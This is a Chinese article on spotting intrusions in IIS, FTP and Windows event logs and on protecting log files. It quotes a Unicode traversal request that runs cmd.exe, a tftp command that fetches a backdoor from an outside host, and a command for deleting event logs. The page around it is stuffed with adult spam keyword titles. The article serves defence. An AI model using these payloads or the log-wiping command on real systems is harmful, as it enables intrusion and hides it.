国产一级一区二区_segui88久久综合9999_97久久夜色精品国产_欧美色网一区二区

掃一掃
關注微信公眾號

如何利用日志分析抵制外部入侵
2008-07-11   51CTO

如今各式各樣的Windows漏洞層出不窮,五花八門的入侵工具更是令人眼花繚亂,稍微懂點網絡知識的人都可以利用各種入侵工具進行入侵,這可給我們的網管帶來了很大的麻煩,雖然經過精心配置的服務器可以抵御大部分入侵,但隨著不斷新出的漏洞,再高明的網管也不敢保證一臺務器長時間不會被侵入,所以,安全配置服務器并不能永遠阻止黑客入侵,而如何檢測入侵者行動以保證服務器安全性就在這樣的情況下顯得非常重要。

日志文件作為微軟Windows系列操作系統中的一個特殊文件,在安全方面具有無可替代的價值。它每天為我們忠實地記錄下系統所發生一切事件,利用它可以使系統管理員快速對潛在的系統入侵作出記錄和預測,但遺憾的是目前絕大多數的人都忽略了它的存在,反而是因為黑客們光臨才會使我們想起這個重要的系統日志文件,很有諷刺意味。

在這里我們就不去講什么日志文件的默認位置、常見備份方法等基本技巧了,這樣的東西黑防以前講得很清楚了,大家可以翻看黑防以前的雜志學習這些東西,我們今天來看看如何分析常見的日志文件吧!

FTP日志分析

FTP日志和WWW日志在默認情況下,每天生成一個日志文件,包含了該日的一切記錄,文件名通常為ex(年份)(月份)(日期)。例如ex040419,就是2004年4月19日產生的日志,用記事本可直接打開,普通的有入侵行為的日志一般是這樣的:

#Software: Microsoft Internet Information Services 5.0(微軟IIS5.0)

#Version: 1.0 (版本1.0)

#Date: 20040419 0315 (服務啟動時間日期)

#Fields: time cip csmethod csuristem scstatus

0315 127.0.0.1 [1]USER administator 331(IP地址為127.0.0.1用戶名為administator試圖登錄)

0318 127.0.0.1 [1]PASS – 530(登錄失敗)

032:04 127.0.0.1 [1]USER nt 331(IP地址為127.0.0.1用戶名為nt的用戶試圖登錄)

032:06 127.0.0.1 [1]PASS – 530(登錄失敗)

032:09 127.0.0.1 [1]USER cyz 331(IP地址為127.0.0.1用戶名為cyz的用戶試圖登錄)

0322 127.0.0.1 [1]PASS – 530(登錄失敗)

0322 127.0.0.1 [1]USER administrator 331(IP地址為127.0.0.1用戶名為administrator試圖登錄)

0324 127.0.0.1 [1]PASS – 230(登錄成功)

0321 127.0.0.1 [1]MKD nt 550(新建目錄失敗)

0325 127.0.0.1 [1]QUIT – 550(退出FTP程序)

從日志里就能看出IP地址為127.0.0.1的用戶一直試圖登錄系統,換了四次用戶名和密碼才成功,管理員立即就可以得知這個IP至少有入侵企圖!而他的入侵時間、IP地址以及探測的用戶名都很清楚的記錄在日志上。如上例入侵者最終是用 Administrator用戶名進入的,那么就要考慮此用戶名是不是密碼失竊?還是被別人利用?接下來就要想想系統出什么問題了。

WWW日志分析

WWW服務同FTP服務一樣,產生的日志也是在%systemroot%sys tem32LogFilesW3SVC1目錄下,默認是每天一個日志文件。這里需要特別說明一下,因為Web的日志和其他日志不同,它的分析要細致得多,需要管理員有豐富的入侵、防護知識,并且要足夠的細心,不然,很容易遺漏那種很簡單的日志,而通常這樣的日志又是非常關鍵的。由于我們不可能一個一個分析,所以這里舉個簡單例子:

#Software: Microsoft Internet Information Services 5.0

#Version: 1.0

#Date: 20040419 03:091

#Fields: date time cip csusername sip sport csmethod csuristem csuriquery scstatus cs(UserAgent)

20040419 03:091 192.168.1.26 192.168.1.37 80 GET /iisstart.asp 200 Mozilla/4.0+(compatible;+MSIE+5.0;+Windows+98;+DigExt)

20040419 03:094 192.168.1.26 192.168.1.37 80 GET /pagerror.gif 200 Mozilla/4.0+(compatible;+MSIE+5.0;+Windows+98;+DigExt)

通過分析第六行,可以看出2004年5月19日,IP地址為192.168.1.26的用戶通過訪問IP地址為192.168.1.37機器的80端口,查看了一個頁面iisstart.asp,這位用戶的瀏覽器為compatible;+MSIE+5.0;+Windows+98+DigExt,有經驗的管理員就可通過安全日志、FTP日志和WWW日志來確定入侵者的IP地址以及入侵時間。

對現在非常常見的SQL注入式攻擊,通過對put、get的檢查,也可以大概判斷是那個頁面出了問題,從而修補。

HTTPD事務日志的分析

Microsoft的IIS 5自公布到現在,被黑客利用的漏洞多不勝數,像.ida/.idq、unicode、WebDavx3和一些未知的漏洞,我們分析日志的目的就是為了分析黑客入侵的行為,對于沒有打好補丁包的系統被黑客成功入侵的日志記錄分別對應如下。為了給大家介紹一個比較醒目的介紹,專門配置了個“古老”的服務器,用舊漏洞給大家做個演示,很容易觸類旁通就懂其它了。

(1)unicode漏洞入侵日志記錄

這個是個非常經典的漏洞了,要找這樣的服務器估計得去國外慢慢找了,但是因為它的日志是最經典的一個,所以我們這里特別拿它來做個示范。

我們打開IIS5的Web服務的日志文件,日志文件默認位置在%systemroot% system32LogFiles文件夾下,如圖1所示是一個典型的Unicode漏洞入侵行為的日志記錄,對于正常的Web訪問,是通過80端口用 GET命令獲取Web數據,但通過非法的字符編碼可繞過字符驗證而得到不應該得到的信息。但補上相應的補丁可堵上此漏洞。如圖一所示。

我們配合入侵來看下這樣的記錄:通過下面的編碼我們在入侵的時候可以查看目標機的目錄文件:

GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 200

則日志中會記錄下此訪問行為:

2004-04-19 08:47:47 192.168.0.1 - 192.168.0.218 80 GET

/_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe

/c+dir 200 -

看到了嗎?我們的日志中記錄地一清二楚,來自192.168.0.1的攻擊者查看我們的目錄。下面一行是向我們的機器傳送后門程序的日志記錄:

2004-04-19 08:47:47 192.168.0.1 - 192.168.0.218 80 GET

/_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe #p#分頁標題#e#

/c+tftp%20-i%2061.48.10.129%20GET%20cool.dll%20c:httpodbc.dll

502 –

看到了吧?記錄非常詳細的,系統里面那個程序在響應都記錄了下來,這樣我們分析入侵行為就好辦了。

(2)WebDavx3遠程溢出日志記錄

過去一段時間有名的Wevdavx3漏洞是應用最廣泛的,如果系統遭受了此遠程溢出的攻擊行為,則日志記錄如圖二所示。

2004-04-19 07:20:13 192.168.0.218 - 192.168.0.218 80 LOCK

/AAAAA……

這表示我們的Web服務受到了來自192.168.0.218的攻擊,并鎖定(即關閉)了WEB服務,后面的一些亂碼字符是在溢出攻擊時使用的偏移位猜過程。

上面的幾種日雜都記錄了有入侵行為的IP地址,但此IP地址說不定就是攻擊者使用了跳板,也就是說此IP很可能是“肉雞”而不是攻擊者的IP,遇到這樣的情況,我們再查看其他日志文件,還是有可能追查出攻擊者的位置的,但這個就完全靠管理員的經驗了。

日志文件的移位保護

通過上面的幾個方法,大家應該可以檢測普通的系統攻擊了,但話說回來,如果上面的攻擊任何一個成功了,那現在我們都看不到日志了,早被入侵者清空了,所以,為了防患于未然,我們還是針對常見的刪除日志的方法,把日志挪挪吧。

好多文章介紹對事件日志移位能做到對系統系統很好的保護,移位雖是一種保護方法,但只要在命令行輸入dir c:*.evt/s,一下就可查找到事件日志位置,再刪除可容易了,那怎么辦呢?其實日志移位要通過修改注冊表來完成,找到注冊表 HKEY_LOCAL_MACHINESYSTEM CurrentControlSet ServicesEventlog下面的Application、Security、System幾個子鍵,分別對應“應用程序日志”、“安全日志”、 “系統日志”。如何修改呢?下面我們具體來看看Application子鍵:File項就是“應用程序日志”文件存放的位置,把此鍵值改為要存放日志文件的文件夾,我們再把%systemroot%system32configappevent.evt文件拷貝到此文件夾,再重啟機器就可以了。

在此介紹移位的目的是為了充分利用Windows 2000在NTFS格式下的“安全”屬性,如果不移位也無法對文件進行安全設置操作,右擊移位后的“文件夾選擇屬性”,進入“安全”選項卡,不選擇“允許將來自父系的可繼承權限傳播給該對象”,添加“System”組,分別給Everyone組“讀取”權限,System組選擇除“完全控制”和“修改”的權限。然后再將系統默認的日志文件512KB大小改為你所想要的大小,如20MB。進行了上面的設置后,直接通過Del C:*.Evt/s/q來刪除是刪不掉的,相對要安全很多了。

通過上面的幾個實際的例子,相信大家都應該具備分析普通入侵日志的能力了,再結合一定的實際經驗,通過日志來發現系統漏洞、追蹤入侵者就簡單很多了。希望此文能拋磚引玉,給大家帶來一些幫助。

熱詞搜索:

上一篇:在Linux操作系統上配置DNS服務器的日志
下一篇:簡單高效:用Swatch做Linux日志分析

分享到: 收藏
国产一级一区二区_segui88久久综合9999_97久久夜色精品国产_欧美色网一区二区
欧美男生操女生| 一区在线播放视频| 国产日产精品1区| 一区二区三区在线观看视频| 三级欧美韩日大片在线看| 国产乱码一区二区三区| 欧美在线视频全部完| 久久精品这里都是精品| 日韩精品电影在线| 91影院在线观看| 久久久精品国产99久久精品芒果 | 狠狠色综合播放一区二区| 99久久精品免费| 国产日产欧美一区| 久久国产精品72免费观看| 欧美日韩一卡二卡三卡| 中文字幕欧美一区| 国产成人超碰人人澡人人澡| 亚洲视频一区二区免费在线观看| 免费成人在线观看| 欧美人与性动xxxx| 亚洲免费观看高清完整版在线| 国产一区二区三区免费| 91精品国产色综合久久不卡电影 | 国产成人亚洲综合a∨婷婷 | 亚洲少妇中出一区| www.欧美日韩| 国产日韩欧美不卡在线| 国产真实乱对白精彩久久| 91精品国产91久久综合桃花| 亚洲a一区二区| 欧美日韩在线不卡| 亚洲成人免费看| 91高清视频免费看| 一区二区三区在线视频观看58| 99re热这里只有精品视频| ●精品国产综合乱码久久久久| 成人一区二区三区视频在线观看| 久久久蜜桃精品| 成人午夜视频福利| 国产精品视频观看| 99re热视频精品| 亚洲综合男人的天堂| 91福利小视频| 午夜精品久久久久久久蜜桃app| 欧美午夜精品久久久久久超碰 | 日韩一区二区三区在线| 青青草国产精品亚洲专区无| 日韩精品一区二区三区在线观看| 免费人成黄页网站在线一区二区| 欧美一级在线观看| 极品美女销魂一区二区三区免费| 精品人在线二区三区| 国产剧情一区在线| 国产精品视频免费看| 欧美在线免费播放| 免费在线观看成人| 国产人成亚洲第一网站在线播放 | 91免费精品国自产拍在线不卡| 亚洲女同ⅹxx女同tv| 欧美性xxxxx极品少妇| 五月天欧美精品| 久久综合99re88久久爱| 成人黄色片在线观看| 亚洲一区二区在线播放相泽| 91精品国产综合久久精品性色| 久久国产精品99精品国产| 国产精品久久久久久久久免费樱桃| av在线不卡网| 免费一级片91| 亚洲婷婷在线视频| 精品国产乱码久久久久久蜜臀 | 亚洲风情在线资源站| 亚洲精品一区二区三区四区高清| 成人午夜电影网站| 免费在线一区观看| 自拍视频在线观看一区二区| 91精品国产综合久久精品麻豆| 粉嫩一区二区三区在线看| 亚洲成av人片www| 欧美激情一区二区在线| 欧美日韩小视频| 不卡欧美aaaaa| 日韩av不卡一区二区| 亚洲视频在线一区二区| 久久综合色8888| 欧美日韩一级二级| 99久久99久久综合| 激情综合亚洲精品| 日韩极品在线观看| 亚洲人123区| 国产三级精品三级在线专区| 欧美久久高跟鞋激| 91成人免费网站| 丰满亚洲少妇av| 国精品**一区二区三区在线蜜桃| 亚洲国产精品影院| 国产精品麻豆欧美日韩ww| 日韩欧美一级二级| 在线91免费看| 一本一道综合狠狠老| 懂色av一区二区三区蜜臀| 精品中文av资源站在线观看| 亚洲综合激情小说| 亚洲码国产岛国毛片在线| 日本一区二区三区国色天香| 日韩欧美国产高清| 日韩一级片网站| 555www色欧美视频| 欧美精品日韩一本| 欧美日本一道本在线视频| 欧美午夜影院一区| 欧美日韩中文国产| 欧美视频日韩视频| 91福利在线播放| 在线一区二区三区四区五区| 99热在这里有精品免费| 成人精品免费视频| 成人性生交大合| 成人精品小蝌蚪| 99久久婷婷国产精品综合| av成人免费在线| 99re在线精品| 欧美性猛交xxxx乱大交退制版| 欧美无砖专区一中文字| 欧美日韩视频专区在线播放| 欧美人与性动xxxx| 日韩精品中文字幕在线不卡尤物| 91精品国产综合久久福利软件| 91精品国产高清一区二区三区蜜臀 | 成人激情黄色小说| 91最新地址在线播放| 一本到一区二区三区| 欧美影院一区二区三区| 欧美精品久久天天躁| 欧美一区二区三区系列电影| 日韩精品一区二区三区中文不卡| 欧美精品一区二| 国产精品人成在线观看免费| 有坂深雪av一区二区精品| 一区二区免费在线播放| 天使萌一区二区三区免费观看| 日韩经典中文字幕一区| 国产福利一区二区三区视频在线 | 国产在线视频一区二区| 福利一区二区在线观看| 欧洲精品中文字幕| 欧美一级高清大全免费观看| 久久奇米777| 亚洲欧美日韩小说| 麻豆成人av在线| 成人av第一页| 欧美精选午夜久久久乱码6080| 精品国产乱码久久久久久久| 国产精品不卡一区二区三区| 亚洲成av人片一区二区梦乃| 国产丶欧美丶日本不卡视频| 日本高清不卡一区| 精品av久久707| 亚洲美女在线一区| 国内精品在线播放| 欧美日韩精品专区| 国产精品全国免费观看高清| 日韩精品欧美成人高清一区二区| 国内精品久久久久影院一蜜桃| 日本乱人伦一区| 国产亚洲女人久久久久毛片| 亚洲一区二区三区四区不卡| 国产毛片一区二区| 欧美日韩电影在线播放| 国产精品久久久久7777按摩| 青青草97国产精品免费观看 | 性做久久久久久免费观看欧美| 国产最新精品精品你懂的| 日本韩国欧美三级| 精品入口麻豆88视频| 亚洲第一狼人社区| av电影天堂一区二区在线观看| 日韩欧美一区在线| 亚洲综合色噜噜狠狠| 国产精华液一区二区三区| 日韩视频一区二区三区在线播放| 亚洲蜜臀av乱码久久精品| 国产精品中文字幕一区二区三区| 欧美日韩成人在线一区| 亚洲欧美日韩国产成人精品影院 | 成人中文字幕在线| 久久无码av三级| 另类小说视频一区二区| 欧美精品亚洲二区| 一区二区三区四区高清精品免费观看| 国产精品乡下勾搭老头1| 日韩一区二区在线看片| 婷婷久久综合九色综合伊人色| 91视频一区二区三区| √…a在线天堂一区| 成人美女视频在线观看| 国产欧美精品国产国产专区| 美国三级日本三级久久99| 69精品人人人人|